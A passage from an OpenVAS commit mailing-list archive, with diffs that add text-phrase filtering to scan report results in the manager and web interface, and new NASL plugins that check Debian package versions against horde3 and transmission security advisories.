(CLIENT_AUTHENTIC); break; } - report_scan_result_count (report, NULL, &result_count); - report_scan_result_count (report, levels, + report_scan_result_count (report, NULL, NULL, &result_count); + report_scan_result_count (report, + levels, + get_report_data->search_phrase, &filtered_result_count); report_scan_run_status (report, &run_status); SENDF_TO_CLIENT_OR_FAIL @@ -4518,13 +4551,17 @@ " status_text=\"" STATUS_OK_TEXT "\">" "" "%s%s" - "%s", - current_uuid, - /* Attribute sort_field. */ - current_name ? current_name : "type", - /* Attribute sort_order. */ - current_int_3 ? "ascending" : "descending", - levels); + "" + "%s" + "%s", + get_report_data->report_id, + get_report_data->sort_field ? get_report_data->sort_field + : "type", + get_report_data->sort_order ? "ascending" : "descending", + levels, + get_report_data->search_phrase + ? get_report_data->search_phrase + : ""); if (strchr (levels, 'h')) SEND_TO_CLIENT_OR_FAIL ("High"); @@ -4580,17 +4617,19 @@ gchar *last_port; GArray *ports = g_array_new (TRUE, FALSE, sizeof (gchar*)); - init_result_iterator (&results, report, NULL, - current_int_1, /* First result. */ - current_int_2, /* Max results. */ - /* Sort by port in order requested. */ - ((current_name /* "sort_field". */ - && (strcmp (current_name, "port") - == 0)) - ? current_int_3 /* "sort_order". */ - : 1), - "port", /* Always desc. by threat. */ - levels); + init_result_iterator + (&results, report, NULL, + get_report_data->first_result, + get_report_data->max_results, + /* Sort by port in order requested. */ + ((get_report_data->sort_field + && (strcmp (get_report_data->sort_field, "port") + == 0)) + ? get_report_data->sort_order + : 1), + "port", + levels, + get_report_data->search_phrase); /* Buffer the results. */ @@ -4627,12 +4666,11 @@ /* Ensure the buffered results are sorted. */ - if (current_name - && strcmp (current_name, /* Attribute sort_field. */ - "port")) + if (get_report_data->sort_field + && strcmp (get_report_data->sort_field, "port")) { /* Sort by threat. */ - if (current_int_3) /* Attribute sort_order. */ + if (get_report_data->sort_order) g_array_sort (ports, compare_ports_asc); else g_array_sort (ports, compare_ports_desc); @@ -4644,8 +4682,8 @@ " start=\"%i\"" " max=\"%i\">", /* Add 1 for 1 indexing. */ - current_int_1 + 1, - current_int_2); + get_report_data->first_result + 1, + get_report_data->max_results); { gchar *item; int index = 0; @@ -4697,20 +4735,19 @@ /* Results. */ init_result_iterator (&results, report, NULL, - current_int_1, /* First result. */ - current_int_2, /* Max results. */ - /* Attribute sort_order. */ - current_int_3, - /* Attribute sort_field. */ - current_name, - levels); + get_report_data->first_result, + get_report_data->max_results, + get_report_data->sort_order, + get_report_data->sort_field, + levels, + get_report_data->search_phrase); SENDF_TO_CLIENT_OR_FAIL ("", /* Add 1 for 1 indexing. */ - current_int_1 + 1, - current_int_2); + get_report_data->first_result + 1, + get_report_data->max_results); while (next (&results)) { const char *descr = result_iterator_descr (&results); @@ -4753,7 +4790,7 @@ SEND_TO_CLIENT_OR_FAIL ("" ""); } - else if (strcasecmp (current_format, "nbe") == 0) + else if (strcasecmp (get_report_data->format, "nbe") == 0) { char *start_time, *end_time; @@ -4777,14 +4814,12 @@ cleanup_iterator (&hosts); init_result_iterator (&results, report, NULL, - current_int_1, /* First result. */ - current_int_2, /* Max results. */ - /* Attribute sort_order. */ - current_int_3, - /* Attribute sort_field. */ - current_name, - /* Attribute levels. */ - modify_task_value); + get_report_data->first_result, + get_report_data->max_results, + get_report_data->sort_order, + get_report_data->sort_field, + get_report_data->levels, + get_report_data->search_phrase); while (next (&results)) g_string_append_printf (nbe, "results|%s|%s|%s|%s|%s|%s\n", @@ -4835,7 +4870,7 @@ SEND_TO_CLIENT_OR_FAIL ("" ""); } - else if (strcasecmp (current_format, "html") == 0) + else if (strcasecmp (get_report_data->format, "html") == 0) { gchar *xml_file; char xml_dir[] = "/tmp/openvasmd_XXXXXX"; @@ -4848,10 +4883,8 @@ else if (xml_file = g_strdup_printf ("%s/report.xml", xml_dir), print_report_xml (report, xml_file, - /* Attribute sort_order. */ - current_int_3, - /* Attribute sort_field. */ - current_name)) + get_report_data->sort_order, + get_report_data->sort_field)) { g_free (xml_file); SEND_TO_CLIENT_OR_FAIL (XML_INTERNAL_ERROR ("get_report")); @@ -4968,7 +5001,7 @@ } } } - else if (strcasecmp (current_format, "html-pdf") == 0) + else if (strcasecmp (get_report_data->format, "html-pdf") == 0) { gchar *xml_file; char xml_dir[] = "/tmp/openvasmd_XXXXXX"; @@ -4983,10 +5016,8 @@ else if (xml_file = g_strdup_printf ("%s/report.xml", xml_dir), print_report_xml (report, xml_file, - /* Attribute sort_order. */ - current_int_3, - /* Attribute sort_field. */ - current_name)) + get_report_data->sort_order, + get_report_data->sort_field)) { g_free (xml_file); SEND_TO_CLIENT_OR_FAIL (XML_INTERNAL_ERROR ("get_report")); @@ -5106,7 +5137,7 @@ } } } - else if (strcasecmp (current_format, "pdf") == 0) + else if (strcasecmp (get_report_data->format, "pdf") == 0) { gchar *latex_file; char latex_dir[] = "/tmp/openvasmd_XXXXXX"; @@ -5120,10 +5151,8 @@ latex_dir), print_report_latex (report, latex_file, - /* Attribute sort_order. */ - current_int_3, - /* Attribute sort_field. */ - current_name)) + get_report_data->sort_order, + get_report_data->sort_field)) { g_free (latex_file); SEND_TO_CLIENT_OR_FAIL (XML_INTERNAL_ERROR ("get_report")); @@ -5248,10 +5277,7 @@ (XML_ERROR_SYNTAX ("get_report", "Bogus report format in format attribute")); } - openvas_free_string_var (¤t_uuid); - openvas_free_string_var (¤t_format); - openvas_free_string_var (&modify_task_value); - openvas_free_string_var (¤t_name); + get_report_data_reset (get_report_data); set_client_state (CLIENT_AUTHENTIC); break; Modified: trunk/openvas-manager/src/tasks_sql.h =================================================================== --- trunk/openvas-manager/src/tasks_sql.h 2010-01-11 20:32:36 UTC (rev 6371) +++ trunk/openvas-manager/src/tasks_sql.h 2010-01-11 22:03:40 UTC (rev 6372) @@ -4434,107 +4434,148 @@ * High, Medium, Low, loG and Debug). All levels if * NULL. * - * @return WHERE clause for levels. + * @return WHERE clause for levels if one is required, else NULL. */ -GString * +static GString * where_levels (const char* levels) { - GString *levels_sql = NULL; + int count; + GString *levels_sql; /* Generate SQL for constraints on message type, according to levels. */ - if (strlen (levels)) + if (levels == NULL || strlen (levels) == 0) + return NULL; + + levels_sql = NULL; + count = 0; + + /* High. */ + if (strchr (levels, 'h')) { - int count = 0; + count = 1; + levels_sql = g_string_new (" AND (type = 'Security Hole'"); + } - /* High. */ - if (strchr (levels, 'h')) - { - count = 1; - levels_sql = g_string_new (" AND (type = 'Security Hole'"); - } + /* Medium. */ + if (strchr (levels, 'm')) + { + if (count == 0) + levels_sql = g_string_new (" AND (type = 'Security Warning'"); + else + levels_sql = g_string_append (levels_sql, + " OR type = 'Security Warning'"); + count++; + } - /* Medium. */ - if (strchr (levels, 'm')) - { - if (count == 0) - levels_sql = g_string_new (" AND (type = 'Security Warning'"); - else - levels_sql = g_string_append (levels_sql, - " OR type = 'Security Warning'"); - count++; - } + /* Low. */ + if (strchr (levels, 'l')) + { + if (count == 0) + levels_sql = g_string_new (" AND (type = 'Security Note'"); + else + levels_sql = g_string_append (levels_sql, + " OR type = 'Security Note'"); + count++; + } - /* Low. */ - if (strchr (levels, 'l')) - { - if (count == 0) - levels_sql = g_string_new (" AND (type = 'Security Note'"); - else - levels_sql = g_string_append (levels_sql, - " OR type = 'Security Note'"); - count++; - } + /* loG. */ + if (strchr (levels, 'g')) + { + if (count == 0) + levels_sql = g_string_new (" AND (type = 'Log Message'"); + else + levels_sql = g_string_append (levels_sql, + " OR type = 'Log Message'"); + count++; + } - /* loG. */ - if (strchr (levels, 'g')) - { - if (count == 0) - levels_sql = g_string_new (" AND (type = 'Log Message'"); - else - levels_sql = g_string_append (levels_sql, - " OR type = 'Log Message'"); - count++; - } + /* Debug. */ + if (strchr (levels, 'd')) + { + if (count == 0) + levels_sql = g_string_new (" AND (type = 'Debug Message')"); + else + levels_sql = g_string_append (levels_sql, + " OR type = 'Debug Message')"); + count++; + } + else if (count) + levels_sql = g_string_append (levels_sql, ")"); - /* Debug. */ - if (strchr (levels, 'd')) - { - if (count == 0) - levels_sql = g_string_new (" AND (type = 'Debug Message')"); - else - levels_sql = g_string_append (levels_sql, - " OR type = 'Debug Message')"); - count++; - } - else if (count) - levels_sql = g_string_append (levels_sql, ")"); + if (count == 5) + { + /* All levels. */ + g_string_free (levels_sql, TRUE); + levels_sql = NULL; + } - if (count == 5) - { - /* All levels. */ - g_string_free (levels_sql, TRUE); - levels_sql = NULL; - } - } return levels_sql; } /** + * @brief Return SQL WHERE for restricting a SELECT to a search phrase. + * + * @param[in] search_phrase Phrase that results must include. All results if + * NULL or "". + * + * @return WHERE clause for search phrase if one is required, else NULL. + */ +static GString * +where_search_phrase (const char* search_phrase) +{ + if (search_phrase) + { + GString *phrase_sql; + gchar *quoted_search_phrase; + + if (strlen (search_phrase) == 0) + return NULL; + + quoted_search_phrase = sql_quote (search_phrase); + phrase_sql = g_string_new (""); + g_string_append_printf (phrase_sql, + " AND (port LIKE '%%%%%s%%%%'" + " OR nvt LIKE '%%%%%s%%%%'" + " OR description LIKE '%%%%%s%%%%')", + quoted_search_phrase, + quoted_search_phrase, + quoted_search_phrase); + g_free (quoted_search_phrase); + + return phrase_sql; + } + return NULL; +} + +/** * @brief Initialise a result iterator. * * The results are ordered by host, then port and type (severity) according * to sort_field. * - * @param[in] iterator Iterator. - * @param[in] report Report whose results the iterator loops over. - * All results if NULL. - * @param[in] host Host whose results the iterator loops over. All - * results if NULL. Only considered if report given. - * @param[in] first_result The result to start from. The results are 0 - * indexed. - * @param[in] max_results The maximum number of results returned. - * @param[in] ascending Whether to sort ascending or descending. - * @param[in] sort_field Field to sort on, or NULL for "type". - * @param[in] levels String describing threat levels (message types) - * to include in report (for example, "hmlgd" for - * High, Medium, Low, loG and Debug). All levels if - * NULL. + * @param[in] iterator Iterator. + * @param[in] report Report whose results the iterator loops over. + * All results if NULL. + * @param[in] host Host whose results the iterator loops over. All + * results if NULL. Only considered if report given. + * @param[in] first_result The result to start from. The results are 0 + * indexed. + * @param[in] max_results The maximum number of results returned. + * @param[in] ascending Whether to sort ascending or descending. + * @param[in] sort_field Field to sort on, or NULL for "type". + * @param[in] levels String describing threat levels (message types) + * to include in report (for example, "hmlgd" for + * High, Medium, Low, loG and Debug). All levels if + * NULL. + * @param[in] search_phrase Phrase that results must include. All results if + * NULL or "". */ void init_result_iterator (iterator_t* iterator, report_t report, const char* host, int first_result, int max_results, int ascending, - const char* sort_field, const char* levels) + const char* sort_field, const char* levels, + const char* search_phrase) { gchar* sql; if (sort_field == NULL) sort_field = "type"; @@ -4542,6 +4583,7 @@ if (report) { GString *levels_sql = where_levels (levels); + GString *phrase_sql = where_search_phrase (search_phrase); /* Allocate the query. */ @@ -4553,10 +4595,12 @@ " AND report_results.result = results.ROWID" " AND results.host = '%s'" "%s" + "%s" " LIMIT %i OFFSET %i;", report, levels_sql ? levels_sql->str : "", host, + phrase_sql ? phrase_sql->str : "", ascending ? ((strcmp (sort_field, "port") == 0) ? " ORDER BY" @@ -4579,11 +4623,13 @@ " FROM results, report_results" " WHERE report_results.report = %llu" "%s" + "%s" " AND report_results.result = results.ROWID" "%s" " LIMIT %i OFFSET %i;", report, levels_sql ? levels_sql->str : "", + phrase_sql ? phrase_sql->str : "", ascending ? ((strcmp (sort_field, "port") == 0) ? " ORDER BY host," @@ -4603,11 +4649,16 @@ first_result); if (levels_sql) g_string_free (levels_sql, TRUE); + if (phrase_sql) g_string_free (phrase_sql, TRUE); } else - sql = g_strdup_printf ("SELECT subnet, host, port, nvt, type, description" - " FROM results LIMIT %i OFFSET %i;", - max_results, first_result); + { + assert (levels == NULL); + assert (search_phrase == NULL); + sql = g_strdup_printf ("SELECT subnet, host, port, nvt, type, description" + " FROM results LIMIT %i OFFSET %i;", + max_results, first_result); + } init_iterator (iterator, sql); g_free (sql); } @@ -4918,37 +4969,35 @@ /** * @brief Get the number of results in the scan associated with a report. * - * @param[in] report Report. - * @param[in] levels String describing threat levels (message types) - * to include in count (for example, "hmlgd" for - * High, Medium, Low, loG and Debug). All levels if - * NULL. - * @param[out] count Total number of results in the scan. + * @param[in] report Report. + * @param[in] levels String describing threat levels (message types) + * to include in count (for example, "hmlgd" for + * High, Medium, Low, loG and Debug). All levels if + * NULL. + * @param[in] search_phrase Phrase that results must include. All results if + * NULL or "". + * @param[out] count Total number of results in the scan. * * @return 0 on success, -1 on error. */ int -report_scan_result_count (report_t report, const char* levels, int* count) +report_scan_result_count (report_t report, const char* levels, + const char* search_phrase, int* count) { - if (levels) - { - GString *levels_sql = where_levels (levels); - *count = sql_int (0, 0, - "SELECT count(*) FROM results, report_results" - " WHERE results.ROWID = report_results.result" - "%s" - " AND report_results.report = %llu;", - levels_sql ? levels_sql->str : "", - report); - if (levels_sql) g_string_free (levels_sql, TRUE); - return 0; - } + GString *levels_sql, *phrase_sql; + levels_sql = where_levels (levels); + phrase_sql = where_search_phrase (search_phrase); *count = sql_int (0, 0, "SELECT count(*) FROM results, report_results" " WHERE results.ROWID = report_results.result" + "%s%s" " AND report_results.report = %llu;", + levels_sql ? levels_sql->str : "", + phrase_sql ? phrase_sql->str : "", report); + if (levels_sql) g_string_free (levels_sql, TRUE); + if (phrase_sql) g_string_free (phrase_sql, TRUE); return 0; } From scm-commit at wald.intevation.org Mon Jan 11 23:26:52 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 11 Jan 2010 23:26:52 +0100 (CET) Subject: [Openvas-commits] r6373 - in trunk/gsa: . src src/html/src src/html/src/help Message-ID: <20100111222652.442E986607C3@pyrosoma.intevation.org> Author: mattm Date: 2010-01-11 23:26:48 +0100 (Mon, 11 Jan 2010) New Revision: 6373 Modified: trunk/gsa/ChangeLog trunk/gsa/src/gsad.c trunk/gsa/src/gsad_omp.c trunk/gsa/src/gsad_omp.h trunk/gsa/src/html/src/gsa-style.css trunk/gsa/src/html/src/help/view_report.htm4 trunk/gsa/src/html/src/omp.xsl Log: Add text phrase filtering to report results. * src/html/src/gsa-style.css (table.odd): New style. * src/gsad.c (init_validator): Add rule "search_phrase". (exec_omp_get): Pass search_phrase to get_report_omp. * src/gsad_omp.c (get_report_omp): Add argument search_phrase. * src/gsad_omp.h: Update headers accordingly. * src/html/src/omp.xsl (html-report-details): Add test phrase filter to threat filter. Grey background of both. Remove threat filter "Current View" and rename "New Filter" to "Threat". * src/html/src/help/reports.htm4: Try improve some descriptions. Correct typos. Describe text phrase filtering. Modified: trunk/gsa/ChangeLog =================================================================== --- trunk/gsa/ChangeLog 2010-01-11 22:03:40 UTC (rev 6372) +++ trunk/gsa/ChangeLog 2010-01-11 22:26:48 UTC (rev 6373) @@ -1,5 +1,25 @@ 2010-01-11 Matthew Mundell + Add text phrase filtering to report results. + + * src/html/src/gsa-style.css (table.odd): New style. + + * src/gsad.c (init_validator): Add rule "search_phrase". + (exec_omp_get): Pass search_phrase to get_report_omp. + + * src/gsad_omp.c (get_report_omp): Add argument search_phrase. + + * src/gsad_omp.h: Update headers accordingly. + + * src/html/src/omp.xsl (html-report-details): Add test phrase filter to + threat filter. Grey background of both. Remove threat filter + "Current View" and rename "New Filter" to "Threat". + + * src/html/src/help/reports.htm4: Try improve some descriptions. Correct + typos. Describe text phrase filtering. + +2010-01-11 Matthew Mundell + * src/gsad.c (request_handler): Pass gsize to get_system_report_omp. 2010-01-11 Felix Wolfsteller Modified: trunk/gsa/src/gsad.c =================================================================== --- trunk/gsa/src/gsad.c 2010-01-11 22:03:40 UTC (rev 6372) +++ trunk/gsa/src/gsad.c 2010-01-11 22:26:48 UTC (rev 6373) @@ -245,6 +245,7 @@ openvas_validator_add (validator, "report_id", "^[a-z0-9\\-]+$"); openvas_validator_add (validator, "role", "^[[:alnum:] ]{1,40}$"); openvas_validator_add (validator, "task_id", "^[a-z0-9\\-]+$"); + openvas_validator_add (validator, "search_phrase", "^[-_[:alnum:], \\./]{0,400}$"); openvas_validator_add (validator, "sort_field", "^[_[:alnum:] ]{1,20}$"); openvas_validator_add (validator, "sort_order", "^(ascending)|(descending)$"); openvas_validator_add (validator, "uuid", "^[0-9abcdefABCDEF.]{1,40}$"); @@ -1664,6 +1665,7 @@ const char *sort_field = NULL; const char *sort_order = NULL; const char *levels = NULL; + const char *search_phrase = NULL; const char *refresh_interval = NULL; const char *duration = NULL; int high = 0, medium = 0, low = 0, log = 0; @@ -1821,6 +1823,17 @@ else log = atoi (level); } + + search_phrase = MHD_lookup_connection_value (connection, + MHD_GET_ARGUMENT_KIND, + "search_phrase"); + if (search_phrase) + { + if (openvas_validate (validator, "search_phrase", search_phrase)) + search_phrase = NULL; + } + else + search_phrase = ""; } else return gsad_message ("Internal error", __FUNCTION__, __LINE__, @@ -1985,7 +1998,8 @@ (const unsigned int) max, sort_field, sort_order, - levels); + levels, + search_phrase); { char *ret; @@ -1999,7 +2013,8 @@ (const unsigned int) max, sort_field, sort_order, - string->str); + string->str, + search_phrase); g_string_free (string, TRUE); return ret; } Modified: trunk/gsa/src/gsad_omp.c =================================================================== --- trunk/gsa/src/gsad_omp.c 2010-01-11 22:03:40 UTC (rev 6372) +++ trunk/gsa/src/gsad_omp.c 2010-01-11 22:26:48 UTC (rev 6373) @@ -3634,14 +3634,16 @@ /** * @brief Get a report and XSL transform the result. * - * @param[in] credentials Username and password for authentication. - * @param[in] report_id ID of report. - * @param[in] format Format of report. - * @param[out] report_len Length of report. - * @param[in] first_result Number of first result in report. - * @param[in] max_results Number of results in report. - * @param[in] sort_field Field to sort on, or NULL. - * @param[in] sort_order "ascending", "descending", or NULL. + * @param[in] credentials Username and password for authentication. + * @param[in] report_id ID of report. + * @param[in] format Format of report. + * @param[out] report_len Length of report. + * @param[in] first_result Number of first result in report. + * @param[in] max_results Number of results in report. + * @param[in] sort_field Field to sort on, or NULL. + * @param[in] sort_order "ascending", "descending", or NULL. + * @param[in] levels Threat levels to include in report. + * @param[in] search_phrase Phrase which included results must contain. * * @return Result of XSL transformation. */ @@ -3651,7 +3653,7 @@ const unsigned int first_result, const unsigned int max_results, const char * sort_field, const char * sort_order, - const char * levels) + const char * levels, const char * search_phrase) { char *report_encoded = NULL; gchar *report_decoded = NULL; @@ -3663,6 +3665,12 @@ *report_len = 0; + if (search_phrase == NULL) + { + xml = g_string_new (GSAD_MESSAGE_INVALID_PARAM ("Get Report")); + return xsl_transform_omp (credentials, g_string_free (xml, FALSE)); + } + if (levels == NULL || strlen (levels) == 0) levels = "hm"; if (format == NULL || strlen (format) == 0) format = "xml"; @@ -3684,7 +3692,8 @@ " max_results=\"%u\"" " sort_field=\"%s\"" " sort_order=\"%s\"" - " levels=\"%s\"/>", + " levels=\"%s\"" + " search_phrase=\"%s\"/>", report_id, format, first_result, @@ -3696,7 +3705,8 @@ || strcmp (sort_field, "type") == 0) ? "descending" : "ascending"), - levels) + levels, + search_phrase) == -1) { g_string_free (xml, TRUE); @@ -3785,10 +3795,12 @@ " format=\"xml\"" " first_result=\"%u\"" " max_results=\"%u\"" - " levels=\"hmlg\"/>", + " levels=\"hmlg\"" + " search_phrase=\"%s\"/>", report_id, first_result, - max_results) + max_results, + search_phrase) == -1) { g_string_free (xml, TRUE); Modified: trunk/gsa/src/gsad_omp.h =================================================================== --- trunk/gsa/src/gsad_omp.h 2010-01-11 22:03:40 UTC (rev 6372) +++ trunk/gsa/src/gsad_omp.h 2010-01-11 22:26:48 UTC (rev 6373) @@ -54,7 +54,7 @@ char * get_report_omp (credentials_t *, const char *, const char *, gsize *, const unsigned int, const unsigned int, const char *, const char *, - const char *); + const char *, const char *); char * create_escalator_omp (credentials_t *, char *, char *, const char *, GArray *, const char *, GArray *, const char *, Modified: trunk/gsa/src/html/src/gsa-style.css =================================================================== --- trunk/gsa/src/html/src/gsa-style.css 2010-01-11 22:03:40 UTC (rev 6372) +++ trunk/gsa/src/html/src/gsa-style.css 2010-01-11 22:26:48 UTC (rev 6373) @@ -189,6 +189,10 @@ background-color: #EEEEEE; } +table.odd { + background-color: #EEEEEE; +} + /* END Greenbone Tables */ /* BEGIN Window decorations */ Modified: trunk/gsa/src/html/src/help/view_report.htm4 =================================================================== --- trunk/gsa/src/html/src/help/view_report.htm4 2010-01-11 22:03:40 UTC (rev 6372) +++ trunk/gsa/src/html/src/help/view_report.htm4 2010-01-11 22:26:48 UTC (rev 6373) @@ -11,17 +11,18 @@

                This "View Report" page summarizes all information the selected report contains. -This page is structured and designed similar to the +This page is structured and designed like the download formats HTML and PDF.

                -It is a single page, the links e.g. to the hosts -reference to the same page further up or down. -Exceptions are the links to the -list of reports -that result from the same -task. +It is a single page with links that +refer to the same page further up or down. +For example, the host names in the "Host" table links to the hosts +results further down the page. +The exception is the "Back to Tasks" link that refers to the +task's +list of reports.

                Download a report

                @@ -36,16 +37,21 @@

                Results shown on the page can be sorted either by the port number or by threat level, and ascending or descending. -The sort oder is changed by clicking on the respective text (e.g. +The sort order is changed by clicking on the respective text (e.g. "threat ascending").

                Result Filtering

                -A checkbox for each threat level (High, Medium, Low and Log) can be ticked to -include results of the respective thread level in the shown report or unticked -to exclude these issues from the shown report. +A checkbox for each threat level (High, Medium, Low and Log) can be ticked +or unticked to +include or exclude results of the respective threat level in the shown report. +This can be combined with a text phrase, which limits the report to all the +results that include the entered phrase. +

                + +

                The list of results is updated after a click on the "Apply" button.

                Modified: trunk/gsa/src/html/src/omp.xsl =================================================================== --- trunk/gsa/src/html/src/omp.xsl 2010-01-11 22:03:40 UTC (rev 6372) +++ trunk/gsa/src/html/src/omp.xsl 2010-01-11 22:26:48 UTC (rev 6373) @@ -334,6 +334,9 @@ +


            - +
            - - - + + + + + + + - - - - - + + + + +
            Current View: -
            - +
            + + + + + +
            + Text phrase: + + +
            Threat: - - - - - -
            - - - - - - - High - - - - - - - - - - Medium - - - - - - - - - - Low - - - - - - - - - - Log - -
            - - -
            New Filter: -
            -
            - - - - - - - -
            - - @@ -521,15 +476,15 @@ Log - -
            -
            -
            -
            + +
            From scm-commit at wald.intevation.org Mon Jan 11 23:48:28 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 11 Jan 2010 23:48:28 +0100 (CET) Subject: [Openvas-commits] r6374 - in trunk/openvas-plugins: . scripts Message-ID: <20100111224828.CFC11861F2C6@pyrosoma.intevation.org> Author: reinke Date: 2010-01-11 23:48:26 +0100 (Mon, 11 Jan 2010) New Revision: 6374 Added: trunk/openvas-plugins/scripts/deb_1966_1.nasl trunk/openvas-plugins/scripts/deb_1967_1.nasl trunk/openvas-plugins/scripts/freebsdsa_bind8.nasl trunk/openvas-plugins/scripts/freebsdsa_ntpd2.nasl trunk/openvas-plugins/scripts/freebsdsa_zfs.nasl Modified: trunk/openvas-plugins/ChangeLog Log: New scripts added Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2010-01-11 22:26:48 UTC (rev 6373) +++ trunk/openvas-plugins/ChangeLog 2010-01-11 22:48:26 UTC (rev 6374) @@ -1,3 +1,12 @@ +2010-01-11 Thomas Reinke + + * scripts/deb_1966_1.nasl, + scripts/deb_1967_1.nasl, + scripts/freebsdsa_bind8.nasl, + scripts/freebsdsa_ntpd2.nasl, + scripts/freebsdsa_zfs.nasl: + New scripts. + 2010-01-11 Michael Meyer * scripts/novell_imanager_detect.nasl, @@ -5,7 +14,7 @@ scripts/novell_imanager_37672.nasl: Added new plugins. -2009-01-09 Chandrashekhar B +2010-01-09 Chandrashekhar B * scripts/gb_kaspersky_prdts_priv_escalation_vuln_jan10.nasl, scripts/gb_kaspersky_av_detect.nasl, @@ -14,11 +23,11 @@ scripts/gb_navicopa_server_detect.nasl: Added new plugins. -2009-01-09 Chandrashekhar B +2010-01-09 Chandrashekhar B * scripts/conficker.nasl: Added comment about detection approach. -2009-12-14 Thomas Reinke +2010-01-09 Thomas Reinke * scripts/freebsd_pear-Net_Ping.nasl, scripts/glsa_201001_01.nasl, Added: trunk/openvas-plugins/scripts/deb_1966_1.nasl =================================================================== --- trunk/openvas-plugins/scripts/deb_1966_1.nasl 2010-01-11 22:26:48 UTC (rev 6373) +++ trunk/openvas-plugins/scripts/deb_1966_1.nasl 2010-01-11 22:48:26 UTC (rev 6374) @@ -0,0 +1,109 @@ +# OpenVAS Vulnerability Test +# $Id$ +# Description: Auto-generated from advisory DSA 1966-1 (horde3) +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisory, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# or at your option, GNU General Public License version 3, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(66657); + script_cve_id("CVE-2009-3237", "CVE-2009-3701", "CVE-2009-4363"); + script_version ("$Revision$"); + script_name("Debian Security Advisory DSA 1966-1 (horde3)"); + + desc = "The remote host is missing an update to horde3 +announced via advisory DSA 1966-1. + +Several vulnerabilities have been found in horde3, the horde web application +framework. The Common Vulnerabilities and Exposures project identifies +the following problems: + +CVE-2009-3237 + +It has been discovered that horde3 is prone to cross-site scripting +attacks via crafted number preferences or inline MIME text parts when +using text/plain as MIME type. +For lenny this issue was already fixed, but as an additional security +precaution, the display of inline text was disabled in the configuration +file. + +CVE-2009-3701 + +It has been discovered that the horde3 administration interface is prone +to cross-site scripting attacks due to the use of the PHP_SELF variable. +This issue can only be exploited by authenticated administrators. + +CVE-2009-4363 + +It has been discovered that horde3 is prone to several cross-site +scripting attacks via crafted data:text/html values in HTML messages. + + +For the stable distribution (lenny), these problems have been fixed in +version 3.2.2+debian0-2+lenny2. + +For the oldstable distribution (etch), these problems have been fixed in +version 3.1.3-4etch7. + +For the testing distribution (squeeze) and the unstable distribution +(sid), these problems have been fixed in version 3.3.6+debian0-1. + + +We recommend that you upgrade your horde3 packages. + +Solution: +https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201966-1 + +Risk factor : High"; + + script_description(desc); + + script_summary("Debian Security Advisory DSA 1966-1 (horde3)"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com"); + script_family("Debian Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/packages"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-deb.inc"); +vuln = 0; +if(isdpkgvuln(pkg:"horde3", ver:"3.1.3-4etch7", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"horde3", ver:"3.2.2+debian0-2+lenny2", rls:"DEB5.0")) { + vuln = 1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/deb_1967_1.nasl =================================================================== --- trunk/openvas-plugins/scripts/deb_1967_1.nasl 2010-01-11 22:26:48 UTC (rev 6373) +++ trunk/openvas-plugins/scripts/deb_1967_1.nasl 2010-01-11 22:48:26 UTC (rev 6374) @@ -0,0 +1,93 @@ +# OpenVAS Vulnerability Test +# $Id$ +# Description: Auto-generated from advisory DSA 1967-1 (transmission) +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisory, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# or at your option, GNU General Public License version 3, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(66658); + script_cve_id("CVE-2010-0012"); + script_version ("$Revision$"); + script_name("Debian Security Advisory DSA 1967-1 (transmission)"); + + desc = "The remote host is missing an update to transmission +announced via advisory DSA 1967-1. + +Dan Rosenberg discovered that Transmission, a lightwight client for +the Bittorrent filesharing protocol performs insufficient sanitising +of file names specified in .torrent files. This could lead to the +overwrite of local files with the privileges of the user running +Transmission if the user is tricked into opening a malicious torrent +file. + +For the stable distribution (lenny), this problem has been fixed in +version 1.22-1+lenny2. + +For the unstable distribution (sid), this problem has been fixed in +version 1.77-1. + +We recommend that you upgrade your transmission packages. + +Solution: +https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201967-1 + +Risk factor : High"; + + script_description(desc); + + script_summary("Debian Security Advisory DSA 1967-1 (transmission)"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com"); + script_family("Debian Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/packages"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-deb.inc"); +vuln = 0; +if(isdpkgvuln(pkg:"transmission", ver:"1.22-1+lenny2", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"transmission-common", ver:"1.22-1+lenny2", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"transmission-cli", ver:"1.22-1+lenny2", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"transmission-gtk", 